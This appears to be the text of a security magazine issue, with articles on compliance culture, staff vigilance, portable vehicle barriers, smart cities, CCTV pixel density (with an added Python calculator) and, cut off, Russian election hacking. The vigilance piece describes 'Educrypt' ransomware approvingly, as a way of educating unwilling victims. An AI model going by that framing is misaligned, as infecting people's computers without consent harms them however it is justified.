With a changing legal landscape and increasingly aggressive enforcement efforts, it is critical that legal, compliance, and human resources professionals understand the laws that impact their organisation, institute robust and meaningful compliance programs, and take aggressive steps to ferret out and prevent corruption in their business dealings. It is not enough for an organisation to have well-articulated standards and comprehensive procedures; they should be embedded in the values of each and every employee through continued training and reinforcement, which should be evident in their actions. There should be a monitoring mechanism to check whether executives specifically are condoning excessive risk-taking and dodging regulators who have expressed concerns. This doesn’t imply that companies should neglect conducting due diligence in their hiring processes. Just like internal and external audits, screening processes are among a business’s first lines of defence and should remain a part of the company’s good housekeeping practices. However, the fact is that these practices are not as effective as commonly believed and perceived. The question is, with the many regulations that are in place, are corporate executives doing a better job of promoting a culture of compliance? Of course it’s a known fact that ‘compliance really starts at the top, no matter what regulatory regime you put into place’, but tone at the top is notoriously difficult to measure. Almost every business, including the most talked-about, Enron, has always said the right thing on paper, via a code of conduct or business ethics, regardless of what ethical train wrecks or integrity dilution might be happening in the real world. Across industries, governance experts say top executives are generally more willing to spend time and money on cultivating a culture of compliance. There is seemingly a concerted effort on the part of companies to better ensure the right tone or culture is set for the organisation to prevent fraudulent activities and corruption, which is a healthy emerging trend.
Protect your organisation with a strong compliance culture & training program
Any organisation seeking to do business lawfully and ethically should have in place a compliance program designed to detect and prevent corrupt payments, which at the bare minimum should include:
• POLICIES - A policy or code of business ethics that clearly prohibits the use of bribery to obtain business or a business advantage.
• PROCEDURES - Detailed procedures, standards, internal accounting controls, reporting mechanisms, and guidance that make sense given the nature and extent of the organisation’s operations. This includes creating clear reporting channels so that affected parties know how to seek guidance and report potential issues internally in the organisation.
• TRAINING - Training programs designed to provide the appropriate education to employees based on their job responsibilities, geographic location, and line of business. Training should communicate the commitment of the organisation and its leaders, and provide clear guidance on how to report questions and concerns.
• COMMITMENT TO DETECT, INVESTIGATE, AND REMEDY - There should be a program to detect and investigate suspected violations, to monitor the effectiveness of the program, and to remedy violations.
• BUSINESS DEVELOPMENT STANDARDS - Standards covering conduct in order to assist in obtaining or retaining business for or with, or directing any business; the bribe need not be authorised or given to obtain business.
Creating a Fraud-Resistant Culture
Every organisation has its own unique way of doing business, usually referred to as the organisational or ‘corporate culture’. This includes the shared values, norms, beliefs and ethical practices which make up the character of the organisation. However, in practice, there can be a great deal of difference between the culture which the organisation appears to be promoting, as perceived by external stakeholders, and the culture which employees within the organisation actually perceive. Nowadays, shareholders, regulators and other stakeholders expect executives to promote a culture where everyone is aware of, and supports, the message that the organisation will carry out its business in an honest and ethical way. How resistant that organisation will be to fraud will depend a lot on the strength of the ethical culture being enforced and practised. It’s nearly impossible to predict whether any given employee will be inclined to commit fraud. However, the environment in which an employee works can be controlled by a company’s leadership in both formal and informal ways to make fraud more difficult and cast it as an affront to the business’s social norms. Most people wish to act as their colleagues do, and, therefore, if the corporate norm is one of zero tolerance for fraudulent activity, the commission of antisocial acts within the context of the business becomes, ideally, inconceivable or improbable. Companies must strive to make their offices and facilities foolproof places where it is hard for an individual to commit fraud and even harder to imagine that he or she could get away with it. It benefits the company to establish a low-risk environment for fraud and provide incentives for ethical behaviour by its executives, managers and employees.
People commit fraud, and because people are social animals, their actions, in great measure, are governed by the culture and environment in which they find.
Conduct periodic Risk Analysis
To create a fraud-resistant environment and culture, organisations must begin with a thorough risk analysis that should include a review of existing corporate policies, an analysis of internal compliance systems and processes, and an examination of the organisation’s communications strategies and practices, keeping in mind the varied regional risk profiles and the organisation’s operations in multiple jurisdictions. These reviews will enable leadership to assess the company’s risk profile holistically. This risk analysis should not be wholly quantitative, since such a confined assessment would neither register nor reflect the ecology of the workplace. Ideally, an independent analyst, whose vision would not be clouded by the current culture, could provide open-minded leadership with an understanding of how people in the company are interacting, how managers are relating to employees and how informal information is shared in the workplace. Such an analysis could reveal where pockets of discontent exist, where dysfunctional behaviour is tolerated and where there are cracks in more formal compliance processes: cracks that breed fraud. Companies can control those environments by putting both formal and informal procedures in place and by constantly reviewing them to understand the mostly unseen, unexplored ecology of their organisation, which is a “must have” culture.
Live the Corporate Culture
A positive and ethical work environment prevailing in an organisation can prevent employee fraud and theft. There should be a clear organisational structure, written policies and procedures and fair employment practices which are inculcated and practised throughout. An open-door policy can also provide a great fraud prevention system, as it gives employees open lines of communication with management. Business owners and senior management should lead by example and hold every employee accountable for their actions, regardless of position; that sets the tone to bring in the required culture.
Cultivating vigilant behaviour in people
Statistics show that a large number of data breaches are due to employee mistakes instead of hackers’ savvy. These mistakes include storing sensitive information on unencrypted hard drives, accessing said information on non-secure devices and ignoring security protocols when opening attachments or sending information over the web. This two-part series provides a framework for cultivating vigilant behavior in people.
By Louis Yau
Singing praises of vigilance, which entails a high level of alertness and avoidance relative to potential risks of loss, as well as subsequent peace of mind, is easy enough. Yet there continues to be a worrying deficit of vigilance in societies and organizations. This issue is alarming, especially in the wake of increasingly sophisticated and multi-lateral threats. Security practitioners and systems alone cannot offer a panacea. The statement “Security is everyone’s responsibility” is a cliché but also quite true. People must take security into their own hands and minds, to be more precise. While it seems logically sound that people should be more vigilant, this is not reflected in reality. The spree of crimes and accidents upon the release of the popular phone game Pokemon Go was largely due to players being completely oblivious to their surroundings. This lack of vigilance led to them walking off cliffs and walking into muggings, to name a few examples. A lack of vigilance is not limited to phone-obsessed millennials, however. Scams, such as the infamous Nigerian Prince email, continue to net millions despite repeated government and bank warnings about them. While it cannot be denied that criminals are getting smarter, ultimately the best defense is vigilance and common sense.
The Change Curve
While it may be argued that embracing vigilant behavior is logically sound and that people shouldn’t be resistant towards change, the reality is that people don’t always think this way. A survey of 3000 employees found that approximately 60% of them did not like their compliance training, with only 44% believing that their training had ‘raised their awareness and understanding of compliance and ethics’. Even the 44% positive response rate is questionable, since many employees answer survey questions based on their perception of what may be the most desirable answer for their employer while spending as little time as possible on completing the survey.
While some may argue that compliance and vigilant behavior are different, they both consist of extra steps designed to proactively avoid negative consequences that damage not just the individual but potentially the entire organization. The change curve is a psychological model created by psychiatrist Elisabeth Kubler-Ross. According to her model, human beings are naturally antagonistic towards change, especially if the change is perceived as negative. In the case of extra vigilance, which often involves rechecking or evaluating actions, it is not improbable for people to feel that vigilant behavior equates to more work, hence making it negative. The aim of the change curve is to highlight the multiple phases people go through before accepting a change. Using this model, it is possible to predict the behavior exhibited at each phase and tailor methods to facilitate a faster acceptance of change. The curve can be split into three stages. The following sections will examine each stage in detail, focusing on how to expedite a stable transition.
First Stage
The principal emotions associated with the first stage are shock and denial. While shock tends to pass fairly quickly, denial can be long-lasting and damaging. The main danger is the spreading of the belief that ‘the previous system was fine’ because ‘it will never happen to me’. This is known as the optimism bias, and can be a very challenging mentality to overcome. While experiencing an event reduces the associated optimism bias, it is best to avoid loss as much as possible, even if it is educational. The best alternative is to provide a logical explanation, with statistics and facts, as to why the previous system is flawed. There are several ways of doing this, but most cases are variations of the following:
• Our new system will likely lead to higher gains.
• Our new system will likely lead to lower losses.
• Our old system will likely lead to higher losses.
• Our old system will likely lead to lower gains.
Of the four explanations, the third one is the most effective. This is due to ‘prospect theory’ or the ‘loss aversion’ cognitive bias, whereby humans are inclined to be risk-willing when avoiding losses and risk-averse when obtaining gains. Risk in this case refers to the probability of them using a new system. Thus, explanations should highlight the potential losses incurred by the original system of non-vigilance in order to improve the chances of people accepting that the new system, that of vigilant behavior, is more effective than its predecessor. Yet sometimes this isn’t enough. As stated above, logic and rationality do not always work. Sometimes people refuse to accept logic. An alternative would be simulations. These disaster simulations provide a more realistic illustration of the consequences of non-vigilant behavior. While there are several companies which offer this service, a program called Educrypt has been educating unwilling participants for a few months now.
Educrypt is a type of ransomware, or malicious software that encrypts sensitive information and demands a ransom for the decryption key. Ransomware is a quickly growing criminal enterprise, with a significant portion of companies losing money due to paying the ransom. The program is spread through a variety of means, including infected internet ads and email attachments. The Educrypt program was an attempt by an anonymous developer to warn people about ransomware. Upon downloading and running the program, the computer is encrypted and a message reprimanding the user for their lack of vigilance is shown on the screen. The decryption key is kept on the computer, along with instructions for how to decrypt the files for free. Simulations are a way of providing experience, and hence reducing the optimism bias, without experiencing the negative consequences associated with it.
About the Author
Louis Yau is a student of International Relations at the University of St Andrews. His research interests include transnational security risks and threat mitigation, with a focus on South-East Asia. He is currently a research assistant in a comprehensive study of post-conflict peace-building in the Philippines, supported by the University of St Andrews.
Ten minute traffic security deployment By Greg Hamm Delta Scientific, Vice President-Marketing and Sales
On December 19, 2016, the news exploded with information about a vehicle attack on a Christmas market in Berlin that killed at least 12 and injured more than 50. Less than a month before, the U.S. State Department had warned about such attacks in public places throughout Europe, saying that extremist groups including the Islamic State and Al Qaeda were planning to focus on such locales during the Holiday Season. Indeed, both terrorist groups have called on followers to use trucks in particular to attack crowds. On July 14, 2016, a truck plowed into Bastille Day vacationers in Nice, France, killing 86 people. Four months later, on November 28, 2016, a car ramming attack and mass stabbing occurred in the United States at 9:52 a.m. EST at Ohio State University's Watts Hall. The attacker, Somali refugee Abdul Razak Ali Artan, was shot and killed by the first responding OSU police officer, and 13 people were hospitalized for injuries, nine of them struck by the vehicle. Luckily, nobody was killed. With vehicles used as weapons becoming a popular terrorist strategy, how can security management control traffic at a temporary event with certified crash equipment that can be simply towed away when the occasion is over, whether protecting farmers’ market shoppers from an errant vehicle or a political event from car and truck bombers? Today, that question can be answered simply: with portable barriers. Moveable self-contained barricades can be towed into position to control vehicle access within 15 minutes, answering the need of organizations that quickly require a temporary barricade system to address a specific threat or secure a facility during special events. They were created for military checkpoints in Afghanistan and Iraq to provide another level of force protection. Three lengths (12, 16 and 20 feet) have been built over the years. These mobile deployable vehicle crash barriers carry an M40 rating, stopping 7.5 ton vehicles traveling 40 mph.
No excavation or sub-surface preparation is required. Once towed into position, the portable barricade uses DC-powered hydraulic pumps to unpack and raise and lower itself off its wheels. There is no hand cranking. Wheels are stored along the sides and the vehicle ramps fold out, completing the implementation. To move the barrier from that spot to another, the procedure is simply reversed.
Who in law enforcement uses mobile, temporary barriers?
Today, over 1,000 of the mobile deployable vehicle crash barriers are being utilized throughout the world. Many of the MP5000s are being used in the Middle East to protect US troops from truck bomb attack. However, it didn’t take long for municipal law enforcement to discover them. Within months of introduction, the Los Angeles Police Department obtained the barriers for a host of duties. During heightened security threats, the MP5000s can easily be installed to create a safe zone at the outer areas surrounding the Parker Center headquarters. They are also used for special events, such as Hollywood awards ceremonies including the Academy Awards, major sporting contests, high-profile trials, or in the potential event of riots or natural disasters such as earthquakes, to provide extra security where it is needed. Ordered by the Secret Service and provided through Global Access Control Systems (Pittsburgh), certified crash barriers also protected attendees at both the Republican and Democratic Conventions this past summer in Cleveland and Philadelphia. The fact that these barriers were ordered well in advance of the tragedy in Nice is indicative of the great foresight and planning that is undertaken by the United States Secret Service. Portable barriers were also at both political conventions in 2012 in Tampa and Charlotte, as well as at the Presidential Inauguration events on January 21, 2013, to aid police and military officers in protecting the president, congressional leaders, judges, journalists, other attendees and onlookers.
During the Presidential Inauguration events, not one vehicle got into position to cause harm. In September of 2015, 18 Delta Scientific 12- and 16-foot mobile deployable vehicle crash barriers helped police and security personnel protect Pope Francis as he traveled to various venues in Washington, D.C., Philadelphia and New York. During the Papal visit engagements, which were witnessed by millions, again, not one vehicle got into position to cause harm. The 12- and 16-foot mobile deployable vehicle crash barriers have also helped police and military officers protect 60 heads of state and other global leaders, over 2,000 journalists, other attendees and onlookers at the Chicago NATO (North Atlantic Treaty Organization) Summit. Ten 12- and 16-foot MP5000 mobile deployable vehicle crash barriers additionally helped the 4,000 police and military officers that protected participants at the Pittsburgh G-20 Summit.
Requests from law enforcement for a smaller model
Although the original portable barriers were doing what they promised, a more commercial barrier that could also be towed into place by something smaller than a truck was requested. Light enough to be towed by a golf cart and set up in only 10 minutes, the new DSC1000 portable barrier provided an ASTM crash rating of P40, which means it will stop a 5,000-pound vehicle going 40 mph. With no foundation or electrical hook-up needed, two people can set up and take down the new DSC1000 barrier in minutes. The self-contained power system provides all the power necessary to raise and lower the unit onto its trailer and open and close the barrier. This battery-powered system re-charges with a solar panel or external means. Controls can be locked or operated at the barricade or remotely. Differing from the “hard stop” wanted for antiterrorist barricades, the Soft Stop technology of the DSC1000 decelerates and stops the vehicle over a short distance.
This is important because, in many cases, the tragedies that the DSC1000 will negate are accidents. Authorities want the vehicle stopped but they also want to minimize injury to the driver. Penn State University uses seven of these barriers for home football games and special events. Like similar applications at the University of Michigan, Ohio State and others, PSU is able to quickly deploy these barriers at strategic sites around the facility. After the event, they are quickly knocked down and towed to another location. The United Kingdom’s embassy in Budapest, Hungary, not only uses the DSC1000 barrier to protect its compound from charging vehicles but they are placed to create a sallyport to tightly control traffic into the embassy. The first barricade is lowered to let in a car, while the barrier in front of the car stays up. The one in back then raises and the car is sandwiched between them. Once searched and OK'd, the second barricade lowers and the car is allowed to enter.
Procurement Often Simplified
From a purchasing standpoint, it can be easier to buy portable barriers than permanent barriers. The latter are oftentimes placed into an organization's real assets budget because they are permanently installed into the ground, becoming part of the property. Such budgets can often create complex purchasing scenarios for an agency. However, purchasing portable barriers is no different from buying protective vests for personnel or new sets of wrenches for the maintenance department. For one-time uses, a lease plan has been created where organizations can simply lease the portable barriers, use them, pack them up and return them. Delta always keeps an inventory for purchase and quick delivery at its manufacturing facility in Palmdale, Calif. That is because, in many cases, they are needed for events that come up quickly, such as politician or celebrity visits and other unexpected incidents.
There's a Portable Barrier to Match Any Need
Although the MP5000 and DSC1000 are the primary models of portable barriers, there are other models for special needs. The bottom line is that there is a crash-rated portable barrier for any temporary entrance that needs to let authorized vehicles through but stop unauthorized vehicles from getting in. Installing quickly and easily, they provide increased security and safety. If you start installation in the morning, you can have protection by lunch.
Protecting the Pope from attack in Philadelphia
Moveable barrier at the G-20 Summit in Pittsburgh
Penn State is one of a number of Big 10 universities using portable barriers on football weekends.
Australian Security Magazine | 15
Smart City Series
What it takes to be a 'Smart City'
By Morry Morgan, APAC Sales 'Guru' and Published Author on Sales and IoT
It may come as no surprise that this year Singapore was named Global Smart City. The city is a metropolitan marvel that supports 5.4 million inhabitants within a concrete and actual jungle, and even boasts a reservoir within the CBD, one that incredibly supplies 10% of Singapore's water needs. Singapore was listed ahead of Barcelona, London, San Francisco and Oslo, with 'technology', 'transport', 'energy' and the 'economy' all main themes within the Worldwide Smart Cities white paper produced by Juniper Research. So too was 'open data'. But then again, 'openness' is easier for some cities than for others. Faith in the government is high in Singapore, where Prime Minister Lee Hsien Loong launched the Smart Nation program in 2014. Since its launch, the small island city-state has deployed an undetermined number of sensors and cameras across the country, allowing the government to monitor the cleanliness of public spaces, the density of crowds and, in the not so distant future, the precise movement of every locally registered vehicle. Very smart, but a bit too 'Big Brother' perhaps? The upside of such a monitored society is Singapore's low crime rate, ranked 118 out of 119 countries. Smart cities are safer cities. This is certainly the belief driving India's own '100 Smart Cities Initiative'. Among its 10 core infrastructure elements is "safety and security of citizens, particularly women, children and the elderly." India is serious about creating smart cities, and this endeavour is being supported by IBM. This year, three Indian cities (Allahabad, Surat and Vizag) were among 17 international cities selected to benefit from the IBM Smarter Cities Challenge. The program, initiated by IBM in 2010, has since deployed over 800 top experts and has helped more than 130 cities around the world 'do more with less', 'bridge silos of information', 'grow civic engagement with the community' and 'make better investment decisions in infrastructure'. According to IBM, these are the main talking points that make a smart city. And when IBM talks, others listen, because this drive to become smarter is a fantastic business opportunity. One such company betting on the smart city trend is HERE. The company, co-owned by German auto giants Audi, BMW and Daimler, offers a consumer app, Here WeGo, that converts data into up-to-the-minute information on current traffic conditions and incidents, much like Google Maps. However, where HERE differs from Google is in its smart city, next-generation automotive services. Through the 'Internet of Things' (IoT), data created by one vehicle, for example by heavy braking before a pothole in the road, is shared across the vehicle network, warning other drivers of the upcoming road hazard. Modern cars have a myriad of onboard sensors, measuring everything from braking, windshield wiper speed and GPS position to the use of hazard lights. HERE takes this assortment of independent data and combines it through the IoT and data analytics to create what it refers to as 'cooperative mobility'. The outcome is a smarter car, a smarter road network and ultimately a smarter city that can boast smoother traffic, reduced congestion and accidents, fewer frustrated drivers and, very soon, fully autonomous vehicles.
Which brings us back to Singapore, and the location of the world's first self-driving taxis that are already picking up passengers. In August this year, selected members of the public were able to hail free taxis via their smartphones and travel within a two kilometre block. While multiple companies, including Google and Volvo, have been testing self-driving cars on public roads for several years, nuTonomy is the first to offer rides to the public. It even beat Uber by a few weeks; Uber now offers rides in autonomous cars in Pittsburgh. For now, Singapore's nuTonomy taxis operate only within a small business and residential district called 'onenorth', beside the National University of Singapore (NUS). Pick-ups and drop-offs are limited to specific locations, and while the car is autonomous, a standby driver is present, just as in Uber's Pittsburgh study - for now. By 2019, another player in the autonomous vehicle race, Delphi Automotive, plans to enter the 'shared economy' in Singapore and eliminate drivers completely, along with the steering wheel and pedals. Delphi is already planning a 100% driverless taxi fleet of 50, which could reduce an average $3-a-mile ride to only 90 cents. This movement from an 'owned' to a 'shared' economy, it would appear, is a smart city prerequisite. The Nokia-sponsored report The Smart City Playbook, by Machina Research, includes 'shared' within its six 'Ss' for a smart city's success, alongside smart, safe, sustainable, secure and scalable. The report was based on a study of 22 cities of varying sizes and geographies at different levels of planning, testing and deployment. The challenge of 'shared' is that it requires an open partner ecosystem allowing for a diverse mix of technology vendors, application developers, service providers, system integrators, utility companies, research institutions and many others. For this reason, smart cities must also have smart leaders. Creating smart cities requires budgeting, planning, negotiating and, of course, a deep understanding of human behaviour. Technology serves a role, to a point, after which human decision making is necessary. And good decision making is only possible when all the information is 'shared', meaning intra-agency politics and competitive business-to-business behaviour must be minimised. That requires smart leadership. Once shared, however, simple data becomes incredibly powerful, because it can lead to cost savings, increased efficiencies and ultimately a stronger economy. Which is what Singapore needs right now. A slump in oil prices, as well as in global seaborne trade, has greatly affected the island-nation's exports. Imports remain high, with the tiny nation importing over 90% of the food its citizens consume. But this isn't why Singapore subscribes to the IBM Smarter Cities Challenge's 'do more with less'; this has always been Singapore's mantra. It is already investing in high-tech indoor farming that is able to produce about 54 tonnes of vegetables a year from as little as 344 square metres. And with vertical gardens, the sky is literally the limit. With most of The Smart City Playbook's 'Ss' ticked off, it is only 'sustainability' that Singapore needs to overcome in order to become the unquestioned Global Smart City. But mark my words, "Grown in Singapore" is coming to a green grocer near you!
CCTV Feature Series 2017
About pixel densities and what they mean
By Vlado Damjanovski, CCTV Specialist, ViDi Labs Pty Ltd
An IP surveillance system may be used to observe and protect people, objects and people's activity inside and outside those objects, traffic and vehicles, money handling in banks, or games in a casino environment. All of these objects of interest may have different clarity when displayed on a workstation screen. The image clarity depends primarily on the camera used, its imaging sensor, its lens and the distance to the object. There is one parameter in IP CCTV that expresses image clarity in a simple way: Pixel Density. Pixel Density is usually expressed in pixels per metre (Pix/m) at the object plane, although it can also be expressed in pixels per foot. Pixel Density in the IP CCTV sense should not be confused with the display pixel density quoted by LCD display manufacturers, which defines screen density in pixels per inch (PPI). The advantage of expressing object clarity by its Pixel Density is that it combines the sensor size, pixel count, focal length and distance to the object in just one parameter. This is one of the main functionalities of the ViDi Labs Calc application. When Pixel Density is used as the metric, all variables are included, and it is universally understandable what detail you will get on an operator's workstation screen. When designing a system, or writing a tender for one, a Pixel Density can be requested for a particular image quality. So, instead of asking for a 6 mm lens for a camera in a particular location (which means nothing without knowing the sensor it is used on), it is much more useful to define a particular Pixel Density for the view. This is then used to calculate the required lens for the particular camera and the distance to the object, which guarantees the clarity of the image (assuming the lens is focussed optimally and there is sufficient light, of course). This can be done very easily with the ViDiLabs Calc.
Pixel Density can be used for any object that an IP CCTV user might be interested in: face, licence plate, playing card, money and similar. Let us now explore how many pixels per metre are attributed to various objects. One of the most commonly referred to pixel densities is for Face Identification. Face Identification in CCTV means sufficient clarity of the image that one can positively identify who the person on the screen is. According to Australian Standard AS 4806.2, Face Identification in analogue CCTV requires 100% of the person's height to fit in the monitor screen height. The detail given by 100% person's height on a screen has been tested many times, and it has been verified to be sufficient for such a person to be identified. A PAL signal is composed of 576 active TV lines, so, according to AS 4806.2, a person's height would occupy all of the active lines to make it 100%. The head occupies around 15% of a person's height, which is equivalent to around 86 lines (576 x 0.15 = 86.4), which is the same number when converted to pixels (assuming the recording is made in full TV frame mode, i.e. two TV fields). If we agree that an average person's height is 170 cm, the head would occupy around 25 cm of that. The Pixel Density at the object required for a positive Face Identification according to AS 4806.2 can therefore be calculated as 86 pixels over 25 cm of head height. Since there are four 25 cm lengths in 1 m, this becomes 4 x 86 = 344 pix/m. So, with a pixel density of 344 pix/m at the object plane it should be possible to positively identify a face according to AS 4806.2. Other standards may require different values; one newer standard, IEC 62676-4, defines 250 pix/m as sufficient (i.e. it suggests that a slightly lower pixel density than the AS standard should allow a person to be identified). Clearly this number is not set in concrete, and it will depend on the observing ability of the operator as well as other parameters (lens quality, illumination, compression artefacts, etc.), but the key point is that such a Pixel Density can be calculated for any type of camera, whether SD, HD, 4K or any other format. Any number for Face Identification Pixel Density can be specified in the ViDiLabs Calc, although the shortcut buttons are designed to show the IEC standard suggestion of 250 pix/m. The next image quality down, as defined by the standards, is Face Recognition. The detail in a Face Recognition image should be sufficient to recognise the gender of a person, what he/she is wearing, and possibly to make an assertion of who that person might be if picked from a group of people that have already been identified elsewhere (e.g. a passport or driver's licence photo).
This is basically an image with half the pixel density of Face Identification, which according to AS 4806.2 is around 172 pix/m, while IEC 62676-4 suggests 125 pix/m. The following examples are from real systems: Similarly, pixel density can be defined for visual recognition of vehicle licence plates (not automatic LPR software). In AS 4806.2 this is defined as 5% character height on a display screen, which is around 30 TV lines (pixels) (to be exact, 576 x 0.05 = 28.8). If we assume that a typical Australian number plate has characters around 90 mm high, this equates to 11 x 30 pixels = 330 pix/m, where the factor 11 is obtained by dividing 1000 mm (1 m) by 90 mm. One may say that visual licence plate recognition requires a similar pixel density to face identification. When money and playing cards are observed in banks or casinos, many practical tests have shown that at least 50 pixels are required across the longer side of the note or card in order to positively identify the values. Standard playing card dimensions are B8 according to ISO 216, which is 62 mm x 88 mm. So we need the 88 mm card length to be covered by at least 50 pixels for proper identification. This means around 550 pix/m (1000 mm / 88 mm = 11, and 50 pix x 11 = 550 pix/m) should be sufficient for playing cards. We may want a slightly higher pixel density for identifying money, since notes are typically larger than playing cards; if one takes the Object Inspect pixel density of 1000 pix/m it should give very good identification, although, as the real-life example below shows, even 770 pix/m may be sufficient. So the following table can be used as a rough guide for various pixel densities.
Minimum required pixel density (Pix/m)
Object Inspect (IEC 62676-4): 1000
Face Identification (AS 4806.2): 344
Face Identification (IEC 62676-4): 250
Face Recognition (AS 4806.2): 172
Face Recognition (IEC 62676-4): 125
Intrusion Detection (AS 4806.2): value missing from the extracted table
Licence Plates visual identification (AS 4806.2): 330
Casino chips (39 mm): value missing from the extracted table
About the pixel blur effect of moving objects
Most objects that we observe in IP CCTV, such as people and vehicles, are not static but moving. When objects move, their image will never be as sharp and clear as that of static objects. The faster the object moves, the more blurred it will appear. The closer the moving object is to the camera, the more blurred it will appear. The longer the camera exposure, the more blurred the object will appear. The camera sensor size and the focal length of the lens also play a role in how blurred the image will appear. And finally, the angle at which the object moves relative to the camera viewing direction also plays a role. So there is a fairly complex relationship between all the parameters mentioned above. The ViDiLabs Calc has been designed to calculate the effects of such motion in the recorded video and show it as pixel blur. Put simply, this calculation shows how smudged a moving object's image is.
Face Identification as per AS4806.2
Face Recognition as per AS4806.2
This blurriness is an unwanted effect, as it makes it difficult to recognise the details of the moving object even if the camera is in focus at that point. By knowing how many "blurry pixels" will appear for a given object speed and camera exposure setting, the ViDiLabs Calc makes it possible to find the exposure setting that will produce less, or acceptable, sensor blur. To produce "live" video in CCTV we require at least 25 fps (or 30 fps). Each TV frame is therefore typically exposed for 1/25 s = 40 ms (in analogue, 1/50 s for TV fields). In bright daylight, the auto-iris lens closes to reduce the amount of light for a correct exposure. If it is very bright, the sensor's electronic exposure control kicks in. In low light, the auto-iris lens opens fully, and if this is not sufficient the sensor's electronic exposure increases further (this is usually called "integration"). Here are some practical examples. If the object is moving at an angle relative to the camera's optical axis, the same rules apply, but the projected speed has to be used as the "real speed" of the moving object. The projected speed is the speed "v" multiplied by the cosine of the angle alpha between the direction of movement and the plane perpendicular to the optical axis. For example, if a bicycle rider moves at 40 km/h at an angle of 30° relative to the optical axis, the angle between the rider's direction of movement and the plane perpendicular to the optical axis is 60°. Then cos 60° = 0.5, which means that, for the purpose of calculating the pixel shift, the projected speed of 40 km/h is 20 km/h. To continue with the same example, let us assume the bicycle rider passes 100 m from the camera at the angle above, and that we have an HD camera with a 1/3" sensor and an 8 mm lens installed. If we use the normal camera shutter of 1/25 s to produce live video, the resulting motion blur from such movement will be 7.1 pixels. Over 7 pixels of smudged moving image may be just too much to recognise the rider. So we need to shorten the exposure (a faster shutter) so that there are far fewer blurred pixels. Using a 1/250 s exposure brings the blur to less than 1 pixel (0.7 in our example), which is much more acceptable.
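The calculations in this section (the AS 4806.2 screen-fraction rule behind the 344 pix/m figure, the camera geometry that Pixel Density folds into one number, and the cyclist blur example above) carried through in Python as an added example; this is not ViDiLabs Calc code. It assumes a 1/3" sensor is 4.8 mm wide and an HD camera is 1920 pixels across (the article gives neither), and with those assumptions it reproduces the 7.1 and 0.7 pixel figures. The IEC level names and thresholds are the ones quoted in the text.

```python
"""Pixel density and motion blur for IP CCTV design (added example)."""
import math

PAL_ACTIVE_LINES = 576

# Assumed active-area widths (mm) for nominal sensor formats; these are
# typical values, not datasheet figures, and vary by vendor.
SENSOR_WIDTH_MM = {'1/4"': 3.6, '1/3"': 4.8, '1/2.8"': 5.4, '1/2"': 6.4}

# IEC 62676-4 levels quoted in the article, highest first.
IEC_LEVELS = (("inspect", 1000.0), ("identify", 250.0), ("recognise", 125.0))


def density_from_screen_rule(screen_fraction, object_height_m,
                             active_lines=PAL_ACTIVE_LINES):
    """Pix/m implied by an AS 4806.2 style rule that the object occupies
    `screen_fraction` of a PAL display's 576 active lines.
    Face identification: head = 15% of a full-height person, ~0.25 m tall.
    The article rounds 86.4 lines to 86 and gets 344; this returns 345.6."""
    return active_lines * screen_fraction / object_height_m


def pixel_density(h_pixels, sensor_width_mm, focal_mm, distance_m):
    """Pix/m at the object plane for a thin-lens camera model."""
    return h_pixels * focal_mm / (sensor_width_mm * distance_m)


def focal_length_for(target_pix_per_m, h_pixels, sensor_width_mm, distance_m):
    """Inverse of pixel_density: the lens (mm) a tender line such as
    '250 Pix/m at 10 m' asks for, once the camera is known."""
    return target_pix_per_m * distance_m * sensor_width_mm / h_pixels


def iec_level(pix_per_m):
    """Best IEC 62676-4 level met at this density, or None below 'recognise'."""
    for name, threshold in IEC_LEVELS:
        if pix_per_m >= threshold:
            return name
    return None


def projected_speed(speed_kmh, angle_to_axis_deg):
    """Speed component (m/s) across the view. Moving at angle a to the
    optical axis gives v*sin(a); the article writes it as v*cos(90 - a)."""
    return speed_kmh / 3.6 * math.sin(math.radians(angle_to_axis_deg))


def motion_blur_px(speed_kmh, angle_to_axis_deg, exposure_s, pix_per_m):
    """Pixels the object smears across during one exposure."""
    return projected_speed(speed_kmh, angle_to_axis_deg) * exposure_s * pix_per_m


def max_exposure_for_blur(max_blur_px, speed_kmh, angle_to_axis_deg, pix_per_m):
    """Longest exposure (s) that keeps blur at or under max_blur_px."""
    return max_blur_px / (projected_speed(speed_kmh, angle_to_axis_deg) * pix_per_m)


def article_example():
    """Cyclist case: HD, 1/3" sensor, 8 mm lens, 100 m away, 40 km/h at 30 deg."""
    ppm = pixel_density(1920, SENSOR_WIDTH_MM['1/3"'], 8.0, 100.0)
    return {
        "pix_per_m": ppm,
        "blur_1_25": motion_blur_px(40, 30, 1 / 25, ppm),
        "blur_1_250": motion_blur_px(40, 30, 1 / 250, ppm),
        "max_exposure_1px": max_exposure_for_blur(1.0, 40, 30, ppm),
    }


if __name__ == "__main__":
    r = article_example()
    print(f"{r['pix_per_m']:.1f} pix/m at 100 m; blur {r['blur_1_25']:.1f} px at 1/25 s, "
          f"{r['blur_1_250']:.1f} px at 1/250 s; keep exposure under "
          f"1/{1 / r['max_exposure_1px']:.0f} s for <= 1 px")
    print("lens for 250 pix/m at 10 m on the same camera:",
          f"{focal_length_for(250, 1920, 4.8, 10):.2f} mm")
```

At 100 m the example camera delivers only 32 pix/m, well below even the IEC 'recognise' threshold, which is the other thing the blur figure does not tell you on its own: a short exposure removes the smear but not the shortage of pixels.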
Money and playing cards shown above at 770 pix/m
Cyber Security Cover Feature
Russia's Cyber War: Options before the US
By Sarosh Bana, APSM Correspondent
US intelligence's findings holding Russian President Vladimir Putin directly responsible for a cyber campaign that ensured Republican Donald Trump's victory in the 2016 presidential election betray Washington's weakness as much as Moscow's deceit. After initially discounting Russia's manipulation, President-elect Trump accepted the findings and spoke of possible action in response, his incoming chief of staff Reince Priebus said on January 8. Priebus, however, did not clarify what line of response was contemplated, or whether Trump agreed specifically on Putin's role. In the 20-page declassified version of its report, Assessing Russian Activities and Intentions in Recent US Elections, released on January 6, the US Intelligence Community, comprising the Central Intelligence Agency (CIA), Federal Bureau of Investigation (FBI) and National Security Agency (NSA), details how Putin ordered an influence campaign aimed at the 2016 US presidential election. The report discloses Putin's and his government's "clear preference" for Trump, which motivated the denigration of his Democratic rival, former Secretary of State Hillary Clinton, and ultimately harmed her electability and potential presidency. The most alarming assessment, however, concerned "Russia's goals" of undermining public faith in the US democratic process. The report described Moscow's cyber onslaught not only as the most recent expression of its longstanding desire to undermine the US-led liberal democratic order, but also as demonstrating "a significant escalation in directness, level of activity, and scope of effort compared to previous operations". Such an evaluation unequivocally signifies a direct Russian attack on the US and its interests. After all, universal suffrage is the underpinning of the democracy that the US is, and its concerted subversion was aimed at advancing a sort of 'regime change', no less.
